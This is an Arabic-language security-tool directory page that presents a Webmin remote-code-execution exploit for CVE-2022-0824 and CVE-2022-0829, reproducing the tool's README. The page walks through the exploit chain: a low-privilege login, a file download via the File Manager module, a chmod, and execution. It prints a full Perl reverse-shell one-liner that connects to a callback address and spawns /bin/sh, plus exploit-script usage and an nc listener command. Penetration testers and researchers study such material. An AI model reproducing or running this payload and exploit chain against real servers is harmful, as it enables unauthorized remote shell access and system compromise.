Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WebminRCE-exploit — CVE-2022-0824, CVE-2022-0829, استغلال صلاحيات File Manger | Kitploit
أدوات/GitHubGitHub/gokul-ramesh/webminrce-exploit
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubgokul-ramesh/webminrce-exploit

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829, استغلال صلاحيات File Manger

عرض المستودع
6منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829 - استغلال صلاحيات مدير الملفات

يمكن العثور على التطبيق القابل للاستغلال لاختبار هذا المفهوم (PoC) هنا كصورة Docker.
المتطلبات الأساسية:

  • Python3
  • وحدة Requests

الوصف

الثغرة

تحكم غير سليم في الوصول يؤدي إلى تنفيذ الأوامر عن بُعد يمكن للمستخدمين الآمنين (المستخدمين غير المميزين) الوصول إلى وحدة مدير الملفات، والتي يجب أن تكون مقيدة افتراضيًا.

حمولة الاستغلال

استخدم ثغرة التحكم غير السليم في الوصول لرفع ملف cgi إلى خادم Webmin.

المرحلة 1 (المصادقة)

قم بالمصادقة وتسجيل الدخول إلى الخادم باستخدام مستخدم آمن/أقل صلاحية.

المرحلة 2 (تنزيل ملف إلى الخادم)

استخدم وحدة مدير الملفات القابلة للاستغلال (/file-manager/http_download.cgi) لتنزيل سكربت Perl إلى الخادم.
سكربت Perl للحصول على وصول الصدفة العكسية :
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

المرحلة 3 (تعديل الصلاحيات)

أضف صلاحية التنفيذ إلى الملف (/file-manager/chmod.cgi)

المرحلة 4 (تنفيذ الأمر)

ببساطة استدعِ الملف المرفوع لتنفيذ سكربت الصدفة العكسية الموجود بداخله.

إرشادات الاستخدام :

  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

مثال على الاستخدام:

$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

اسم المستخدم وكلمة المرور مخصصان للمستخدمين الآمنين (غير المميزين) قم بإعداد مستمع (listener) قبل تشغيل السكربت للحصول على اتصال الصدفة العكسية.

$ nc -lvp <port>

شكرًا لـ @faisalfs10x على الاستغلال.

تنزيل الأداة